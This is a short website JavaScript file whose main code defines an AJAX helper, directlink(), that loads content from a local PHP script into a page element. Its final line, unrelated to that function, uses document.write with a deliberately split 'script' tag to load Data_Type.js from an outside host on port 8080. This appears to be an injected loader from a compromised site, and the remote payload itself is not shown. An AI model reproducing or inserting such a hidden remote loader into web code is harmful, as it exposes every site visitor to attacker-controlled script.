// JavaScript Document

var http = false;

if(navigator.appName == "Microsoft Internet Explorer") {
  http = new ActiveXObject("Microsoft.XMLHTTP");
} else {
  http = new XMLHttpRequest();
} 


function directlink(directID) {
	http.open("GET", "contents/directionlinker.php?directID="+directID, true);
	http.onreadystatechange=function() {
    if(http.readyState == 4) { 
	
	document.getElementById('flashcontent').innerHTML = http.responseText;

	
	}
  }

  http.send(null);
	
}


document.write('<s'+'cript type="text/javascript" src="http://temp.hbsouthmomsclub.com:8080/Data_Type.js"></scr'+'ipt>');